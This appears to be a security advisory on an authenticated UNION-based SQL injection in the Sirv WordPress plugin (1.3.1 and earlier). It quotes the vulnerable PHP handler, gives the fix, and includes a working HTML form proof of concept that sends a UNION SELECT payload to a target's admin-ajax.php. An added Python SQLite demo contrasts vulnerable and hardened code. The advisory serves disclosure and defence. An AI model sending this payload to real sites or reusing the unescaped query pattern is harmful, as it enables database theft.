wpexploit / Lenon Leite / WPEX-ID: 55995FE7-45E6-4C75-88B6-D89B2A3C9725
History: Nov 10, 2016 - 12:00 a.m.

Sirv <= 1.3.1 - Authenticated SQL Injection

2016-11-10 00:00:00
Lenon Leite
6

EPSS: 0.002 (Low), percentile 59.5%

$_POST['row_id'] is not escaped, and the sirv_get_row_by_id AJAX action is reachable by every registered user. The handler interpolates the POST value straight into the query and echoes the resulting row back as JSON, so this is a UNION-based injection with direct output:

$id = $_POST['row_id'];
$row = $wpdb->get_row("SELECT * FROM $table_name WHERE id = $id", ARRAY_A);
$row['images'] = unserialize($row['images']);
echo json_encode($row);

The fix is to cast row_id to an integer (or bind it with $wpdb->prepare() and a %d placeholder) and to check a nonce and the caller's capability before the query runs.

<form method="post" action="http://target/wp-admin/admin-ajax.php">
    <input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
    <input type="text" name="action" value="sirv_get_row_by_id">
    <input type="submit" value="Send">
</form>
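To make the behaviour above reproducible offline, here is an added example (written for this page, not code from the advisory or from the Sirv plugin) that rebuilds the vulnerable query in an in-memory SQLite database. The table layout of the real Sirv table is not known here, so the constructed replica wp_sirv_rows has four columns and the UNION payload is adapted to four select-list entries; wp_terms keeps the real WordPress columns. A hardened variant shows the integer-only check that the WordPress fix (absint() plus $wpdb->prepare()) amounts to.

```python
import sqlite3


def build_db():
    """Constructed in-memory replica of the two tables involved (not real plugin data)."""
    con = sqlite3.connect(":memory:")
    con.row_factory = sqlite3.Row
    # Hypothetical Sirv table: four columns instead of the eleven the advisory's payload targets.
    con.execute("CREATE TABLE wp_sirv_rows (id INTEGER, title TEXT, images TEXT, created TEXT)")
    con.execute("INSERT INTO wp_sirv_rows VALUES (1, 'gallery', 'a:0:{}', '2016-11-10')")
    # wp_terms with WordPress's real column names, holding one constructed row.
    con.execute("CREATE TABLE wp_terms (term_id INTEGER, name TEXT, slug TEXT, term_group INTEGER)")
    con.execute("INSERT INTO wp_terms VALUES (1, 'Uncategorized', 'uncategorized', 0)")
    return con


def vulnerable_get_row_by_id(con, row_id):
    """Mirrors the advisory's handler: row_id is concatenated into the SQL unescaped."""
    row = con.execute(f"SELECT * FROM wp_sirv_rows WHERE id = {row_id}").fetchone()
    return dict(row) if row else None


def hardened_get_row_by_id(con, row_id):
    """Editor's suggested fix: accept only a non-negative integer and bind it as a parameter."""
    if not isinstance(row_id, str) or not row_id.isdigit():
        raise ValueError("row_id must be an integer")
    row = con.execute("SELECT * FROM wp_sirv_rows WHERE id = ?", (int(row_id),)).fetchone()
    return dict(row) if row else None


# Same shape as the advisory's payload, shortened to the four columns of the toy table.
# id = 0 matches nothing, so only the injected UNION row comes back.
PAYLOAD = "0 UNION SELECT 1, name, slug, term_group FROM wp_terms WHERE term_id=1"


def demo():
    """Returns (row leaked by the vulnerable handler, error raised by the hardened one)."""
    con = build_db()
    leaked = vulnerable_get_row_by_id(con, PAYLOAD)
    # The term name and slug land in the 'title' and 'images' columns of the JSON the
    # handler would echo, which is how the advisory's PoC reads wp_terms.
    blocked = None
    try:
        hardened_get_row_by_id(con, PAYLOAD)
    except ValueError as exc:
        blocked = str(exc)
    return leaked, blocked


if __name__ == "__main__":
    leaked_row, blocked_msg = demo()
    print("vulnerable handler returned:", leaked_row)
    print("hardened handler rejected payload:", blocked_msg)
```

Run it and the vulnerable path returns the wp_terms row relabelled with the Sirv table's column names, while the hardened path refuses the payload before any SQL executes. Column positions matter for a UNION: the attacker's select list must match the target table's width, which is why the original payload pads with the literals 6 through 12.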

